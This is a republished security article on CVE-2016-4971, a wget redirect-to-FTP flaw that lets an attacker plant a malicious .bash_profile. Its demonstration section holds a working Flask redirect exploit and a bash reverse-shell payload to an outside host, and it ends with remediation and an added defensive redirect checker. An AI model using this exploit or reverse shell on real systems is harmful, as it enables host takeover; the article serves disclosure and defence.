How CVE‑2016‑4971 Lets Attackers Hijack wget to Install Rootkits

The CVE‑2016‑4971 vulnerability in older wget versions allows attackers to redirect HTTP downloads to malicious FTP resources, causing hidden .bash_profile files to be written and executed, which can grant full host compromise and rootkit installation.

AI Cyberspace

Vulnerability description – CVE‑2016‑4971 has been disclosed and affects all versions of wget before 1.18. Attackers can exploit this flaw by tricking developers and operations engineers into fetching a crafted URL, gaining host privileges or planting rootkits.

How the flaw works – wget is a common *nix download tool supporting HTTP, HTTPS, FTP, etc. When wget follows an HTTP redirect to an FTP URL, it trusts the redirected FTP link and saves the download under the filename taken from that URL without any further verification, so a redirect can deliver a malicious file that compromises the host.

For example, running wget http://attackers-server/safe_file.txt may receive the following HTTP response:

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Location: ftp://attackers-server/.bash_profile
Content-Length: 262
Server: Apache

If the download runs in the user's home directory and no .bash_profile already exists there, wget saves the redirected file as .bash_profile. The attacker can embed arbitrary code in this file, and it will be executed the next time a login shell is started, leading to host compromise.

Attack demonstration

The following simple HTTP service (testWget.py) redirects to an FTP resource containing a malicious .bash_profile payload:

#!/usr/bin/env python
from flask import Flask, redirect

app = Flask(__name__)

# Any request for the harmless-looking file is answered with a 302
# pointing at an FTP resource whose filename is .bash_profile.
@app.route("/noharm.txt")
def test():
    return redirect("ftp://192.168.50.116/.bash_profile")

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=80)

On the machine 192.168.50.116, an FTP service is started and the payload bash -i >& /dev/tcp/74.207.xxx.xxx/9980 0>&1 is placed in the .bash_profile. A listener on port 9980 is opened on the attacker’s VPS.

From another host, 192.168.50.61, the attacker runs wget http://192.168.50.116/noharm.txt. After exiting and re‑entering the shell (which sources .bash_profile), the malicious code executes and the listener receives a shell on 192.168.50.61, giving the attacker full shell privileges on the target.

Remediation – Upgrade wget to GNU wget 1.18 or later, which fixes the redirect handling so the redirected filename is no longer trusted by default.
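As an added example (not code from the original article), the following Python models the filename decision behind this bug: it extracts the Location header from the 302 response shown above, derives the local filename a pre‑1.18 wget would use from the redirected URL versus the one the patched default derives from the original URL, and flags the signs a defender can check for in redirect chains (scheme change to FTP, dotfile target). The raw response is constructed to match the page's example; the policy rules are this example's own, not wget's code.

```python
"""Redirect-chain check illustrating CVE-2016-4971 (added example)."""
import posixpath
from urllib.parse import urljoin, urlsplit

# Constructed response, same shape as the 302 shown in the article.
RAW_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Cache-Control: private\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Location: ftp://attackers-server/.bash_profile\r\n"
    "Content-Length: 262\r\n"
    "Server: Apache\r\n\r\n"
)

def parse_location(raw):
    """Return the Location header of a raw HTTP response, or None."""
    head = raw.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() == "location":
            return value.strip()
    return None

def local_name(url):
    """Filename derived from a URL's last path segment (wget's default rule)."""
    return posixpath.basename(urlsplit(url).path) or "index.html"

def evaluate_redirect(original_url, location):
    """Compare the pre-1.18 and patched filename choices and list red flags."""
    target = urljoin(original_url, location)      # absolute Location wins
    orig, dest = urlsplit(original_url), urlsplit(target)
    findings = []
    if orig.scheme != dest.scheme:
        findings.append("scheme changed %s -> %s" % (orig.scheme, dest.scheme))
    if orig.netloc != dest.netloc:
        findings.append("host changed %s -> %s" % (orig.netloc, dest.netloc))
    if local_name(target).startswith("."):
        findings.append("redirect target is a dotfile: " + local_name(target))
    return {
        "target": target,
        "vulnerable_name": local_name(target),    # what old wget wrote
        "safe_name": local_name(original_url),    # wget >= 1.18 default
        "findings": findings,
    }

if __name__ == "__main__":
    loc = parse_location(RAW_RESPONSE)
    print(evaluate_redirect("http://attackers-server/safe_file.txt", loc))
```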

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.
